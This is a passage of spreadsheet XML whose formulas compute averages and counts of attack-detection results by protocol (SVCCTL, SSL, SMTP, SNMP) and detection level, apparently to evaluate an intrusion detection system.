        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ25)</f>
        <v>0</v>
      </c>
      <c r="FS25" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ25)</f>
        <v>0</v>
      </c>
      <c r="FT25" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ25)</f>
        <v>0</v>
      </c>
      <c r="FU25" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ25)</f>
        <v>2</v>
      </c>
    </row>
    <row r="26">
      <c r="D26" s="660">
        <f>AVERAGE('(B) - Detecciones - Ataques'!IP3:IP139)</f>
        <v>0.3900135512</v>
      </c>
      <c r="E26" s="648">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!IP3:IP139)</f>
        <v>0.5389983694</v>
      </c>
      <c r="DD26" s="572" t="s">
        <v>2473</v>
      </c>
      <c r="DE26" s="221"/>
      <c r="DF26" s="222"/>
      <c r="DR26" s="722"/>
      <c r="DS26" s="722"/>
      <c r="DT26" s="722"/>
      <c r="DU26" s="722"/>
      <c r="DV26" s="722"/>
      <c r="DW26" s="722"/>
      <c r="EE26" s="688" t="s">
        <v>558</v>
      </c>
      <c r="EF26" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG26" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH26" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI26" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE26,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE26  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ26" s="336"/>
      <c r="EK26" s="336"/>
      <c r="EL26" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP17&lt;&gt;0,'(B) - Detecciones - Ataques'!IP17*'(B) - Detecciones - Ataques'!IL17/('(B) - Detecciones - Ataques'!IL17+'(B) - Detecciones - Ataques'!IN17),0)</f>
        <v>0</v>
      </c>
      <c r="EM26" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP17&lt;&gt;0,'(B) - Detecciones - Ataques'!IP17*'(B) - Detecciones - Ataques'!IN17/('(B) - Detecciones - Ataques'!IL17+'(B) - Detecciones - Ataques'!IN17),0)</f>
        <v>0</v>
      </c>
      <c r="EN26" s="626"/>
      <c r="EO26" s="626"/>
      <c r="EP26" s="744"/>
      <c r="EQ26" s="745"/>
      <c r="ER26" s="762"/>
      <c r="ES26" s="762"/>
      <c r="ET26" s="762"/>
      <c r="EU26" s="762"/>
      <c r="EV26" s="762"/>
      <c r="EW26" s="762"/>
      <c r="EX26" s="745"/>
      <c r="EY26" s="745"/>
      <c r="EZ26" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="FA26" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ26)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ26 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ26)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ26 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FB26" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ26)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ26 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ26)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ26 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC26" s="621"/>
      <c r="FQ26" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SVCCTL")</f>
        <v>SVCCTL</v>
      </c>
      <c r="FR26" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ26)</f>
        <v>0.09090909091</v>
      </c>
      <c r="FS26" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ26)</f>
        <v>0.09090909091</v>
      </c>
      <c r="FT26" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ26)</f>
        <v>1</v>
      </c>
      <c r="FU26" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ26)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="DD27" s="763" t="s">
        <v>2452</v>
      </c>
      <c r="DE27" s="764" t="s">
        <v>2477</v>
      </c>
      <c r="DF27" s="585">
        <f>E16/E12</f>
        <v>0.8760697614</v>
      </c>
      <c r="DR27" s="722"/>
      <c r="DS27" s="722"/>
      <c r="DT27" s="722"/>
      <c r="DU27" s="722"/>
      <c r="DV27" s="722"/>
      <c r="DW27" s="722"/>
      <c r="EG27" s="621"/>
      <c r="EH27" s="621"/>
      <c r="EL27" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP18&lt;&gt;0,'(B) - Detecciones - Ataques'!IP18*'(B) - Detecciones - Ataques'!IL18/('(B) - Detecciones - Ataques'!IL18+'(B) - Detecciones - Ataques'!IN18),0)</f>
        <v>0</v>
      </c>
      <c r="EM27" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP18&lt;&gt;0,'(B) - Detecciones - Ataques'!IP18*'(B) - Detecciones - Ataques'!IN18/('(B) - Detecciones - Ataques'!IL18+'(B) - Detecciones - Ataques'!IN18),0)</f>
        <v>0</v>
      </c>
      <c r="EN27" s="626"/>
      <c r="EO27" s="626"/>
      <c r="EP27" s="744"/>
      <c r="EQ27" s="745"/>
      <c r="ER27" s="762" t="s">
        <v>2680</v>
      </c>
      <c r="ES27" s="765">
        <f t="shared" ref="ES27:ET27" si="23">SUM(ES9:ES25)</f>
        <v>52</v>
      </c>
      <c r="ET27" s="765">
        <f t="shared" si="23"/>
        <v>93</v>
      </c>
      <c r="EU27" s="766">
        <f t="shared" ref="EU27:EU28" si="24">ES27/ET27</f>
        <v>0.5591397849</v>
      </c>
      <c r="EV27" s="762"/>
      <c r="EW27" s="762"/>
      <c r="EX27" s="745"/>
      <c r="EY27" s="745"/>
      <c r="EZ27" s="379" t="s">
        <v>244</v>
      </c>
      <c r="FA27" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ27)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ27 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ27)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ27 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FB27" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ27)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ27 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ27)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ27 &amp; "*"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="FC27" s="621"/>
      <c r="FK27" s="69"/>
      <c r="FL27" s="69"/>
      <c r="FM27" s="69"/>
      <c r="FN27" s="69"/>
      <c r="FO27" s="69"/>
      <c r="FP27" s="69"/>
      <c r="FQ27" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SSL")</f>
        <v>SSL</v>
      </c>
      <c r="FR27" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ27)</f>
        <v>0</v>
      </c>
      <c r="FS27" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ27)</f>
        <v>0</v>
      </c>
      <c r="FT27" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ27)</f>
        <v>0</v>
      </c>
      <c r="FU27" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ27)</f>
        <v>1</v>
      </c>
    </row>
    <row r="28">
      <c r="DD28" s="382" t="s">
        <v>2462</v>
      </c>
      <c r="DE28" s="767" t="s">
        <v>2478</v>
      </c>
      <c r="DF28" s="369">
        <f>1-(DF23/DE23)</f>
        <v>0.2745901639</v>
      </c>
      <c r="DR28" s="722"/>
      <c r="DS28" s="722"/>
      <c r="DT28" s="722"/>
      <c r="DU28" s="722"/>
      <c r="DV28" s="722"/>
      <c r="DW28" s="722"/>
      <c r="EG28" s="173"/>
      <c r="EH28" s="173"/>
      <c r="EL28" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP19&lt;&gt;0,'(B) - Detecciones - Ataques'!IP19*'(B) - Detecciones - Ataques'!IL19/('(B) - Detecciones - Ataques'!IL19+'(B) - Detecciones - Ataques'!IN19),0)</f>
        <v>0</v>
      </c>
      <c r="EM28" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP19&lt;&gt;0,'(B) - Detecciones - Ataques'!IP19*'(B) - Detecciones - Ataques'!IN19/('(B) - Detecciones - Ataques'!IL19+'(B) - Detecciones - Ataques'!IN19),0)</f>
        <v>0</v>
      </c>
      <c r="EN28" s="626"/>
      <c r="EO28" s="626"/>
      <c r="EP28" s="744"/>
      <c r="EQ28" s="745"/>
      <c r="ER28" s="762" t="s">
        <v>2681</v>
      </c>
      <c r="ES28" s="765">
        <f>ET27-ES27</f>
        <v>41</v>
      </c>
      <c r="ET28" s="765">
        <f>ET27</f>
        <v>93</v>
      </c>
      <c r="EU28" s="766">
        <f t="shared" si="24"/>
        <v>0.4408602151</v>
      </c>
      <c r="EV28" s="762"/>
      <c r="EW28" s="762"/>
      <c r="EX28" s="745"/>
      <c r="EY28" s="745"/>
      <c r="EZ28" s="379" t="s">
        <v>427</v>
      </c>
      <c r="FA28" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ28)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ28 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ28)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ28 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FB28" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ28)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ28 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ28)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ28 &amp; "*"))</f>
        <v>0.4</v>
      </c>
      <c r="FC28" s="621"/>
      <c r="FK28" s="69"/>
      <c r="FL28" s="69"/>
      <c r="FM28" s="69"/>
      <c r="FQ28" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMTP")</f>
        <v>SMTP</v>
      </c>
      <c r="FR28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ28)</f>
        <v>1</v>
      </c>
      <c r="FS28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ28)</f>
        <v>1</v>
      </c>
      <c r="FT28" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ28)</f>
        <v>1</v>
      </c>
      <c r="FU28" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ28)</f>
        <v>1</v>
      </c>
    </row>
    <row r="29" ht="36.75" customHeight="1">
      <c r="DD29" s="382" t="s">
        <v>2465</v>
      </c>
      <c r="DE29" s="383"/>
      <c r="DF29" s="385">
        <f>SQRT(DF27*(1-DF28))</f>
        <v>0.7971885737</v>
      </c>
      <c r="DR29" s="722"/>
      <c r="DS29" s="722"/>
      <c r="DT29" s="722"/>
      <c r="DU29" s="722"/>
      <c r="DV29" s="722"/>
      <c r="DW29" s="722"/>
      <c r="EG29" s="403"/>
      <c r="EH29" s="403"/>
      <c r="EL29" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP20&lt;&gt;0,'(B) - Detecciones - Ataques'!IP20*'(B) - Detecciones - Ataques'!IL20/('(B) - Detecciones - Ataques'!IL20+'(B) - Detecciones - Ataques'!IN20),0)</f>
        <v>0</v>
      </c>
      <c r="EM29" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP20&lt;&gt;0,'(B) - Detecciones - Ataques'!IP20*'(B) - Detecciones - Ataques'!IN20/('(B) - Detecciones - Ataques'!IL20+'(B) - Detecciones - Ataques'!IN20),0)</f>
        <v>0</v>
      </c>
      <c r="EN29" s="626"/>
      <c r="EO29" s="626"/>
      <c r="EP29" s="744"/>
      <c r="EQ29" s="745"/>
      <c r="ER29" s="745"/>
      <c r="ES29" s="745"/>
      <c r="ET29" s="745"/>
      <c r="EU29" s="745"/>
      <c r="EV29" s="745"/>
      <c r="EW29" s="745"/>
      <c r="EX29" s="745"/>
      <c r="EY29" s="745"/>
      <c r="EZ29" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="FA29" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ29)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ29 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ29)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ29 &amp; "*"))</f>
        <v>0.4209203914</v>
      </c>
      <c r="FB29" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ29)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ29 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ29)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ29 &amp; "*"))</f>
        <v>0.5263157895</v>
      </c>
      <c r="FC29" s="621"/>
      <c r="FO29" s="69"/>
      <c r="FP29" s="69"/>
      <c r="FQ29" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SNMP")</f>
        <v>SNMP</v>
      </c>
      <c r="FR29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ29)</f>
        <v>1</v>
      </c>
      <c r="FS29" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ29)</f>
        <v>1</v>
      </c>
      <c r="FT29" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ29)</f>
        <v>1</v>
      </c>
      <c r="FU29" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ29)</f>
        <v>1</v>
      </c>
    </row>
    <row r="30">
      <c r="DD30" s="416"/>
      <c r="DF30" s="662" t="s">
        <v>2717</v>
      </c>
      <c r="DR30" s="722"/>
      <c r="DS30" s="722"/>
      <c r="DT30" s="722"/>
      <c r="DU30" s="722"/>
      <c r="DV30" s="722"/>
      <c r="DW30" s="722"/>
      <c r="EG30" s="336"/>
      <c r="EH30" s="336"/>
      <c r="EL30" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP21&lt;&gt;0,'(B) - Detecciones - Ataques'!IP21*'(B) - Detecciones - Ataques'!IL21/('(B) - Detecciones - Ataques'!IL21+'(B) - Detecciones - Ataques'!IN21),0)</f>
        <v>0.9874213836</v>
      </c>
      <c r="EM30" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP21&lt;&gt;0,'(B) - Detecciones - Ataques'!IP21*'(B) - Detecciones - Ataques'!IN21/('(B) - Detecciones - Ataques'!IL21+'(B) - Detecciones - Ataques'!IN21),0)</f>
        <v>0</v>
      </c>
      <c r="EN30" s="626"/>
      <c r="EO30" s="626"/>
      <c r="EP30" s="744"/>
      <c r="EQ30" s="745"/>
      <c r="ER30" s="745"/>
      <c r="ES30" s="745"/>
      <c r="ET30" s="745"/>
      <c r="EU30" s="745"/>
      <c r="EV30" s="745"/>
      <c r="EW30" s="745"/>
      <c r="EX30" s="745"/>
      <c r="EY30" s="745"/>
      <c r="EZ30" s="379" t="s">
        <v>209</v>
      </c>
      <c r="FA30" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ30)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ30 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ30)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ30 &amp; "*"))</f>
        <v>0.7307692308</v>
      </c>
      <c r="FB30" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ30)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ30 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ30)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ30 &amp; "*"))</f>
        <v>0.6923076923</v>
      </c>
      <c r="FC30" s="621"/>
      <c r="FO30" s="69"/>
      <c r="FP30" s="69"/>
      <c r="FQ30" s="36"/>
      <c r="FR30" s="336" t="str">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ30)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="FS30" s="336" t="str">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ30)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="FT30" s="375" t="str">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ30)</f>
        <v>#DIV/0!</v>
      </c>
      <c r="FU30" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ30)</f>
        <v>0</v>
      </c>
    </row>
    <row r="31">
      <c r="DR31" s="722"/>
      <c r="DS31" s="722"/>
      <c r="DT31" s="722"/>
      <c r="DU31" s="722"/>
      <c r="DV31" s="722"/>
      <c r="DW31" s="722"/>
      <c r="EG31" s="20"/>
      <c r="EH31" s="20"/>
      <c r="EL31" s="626">
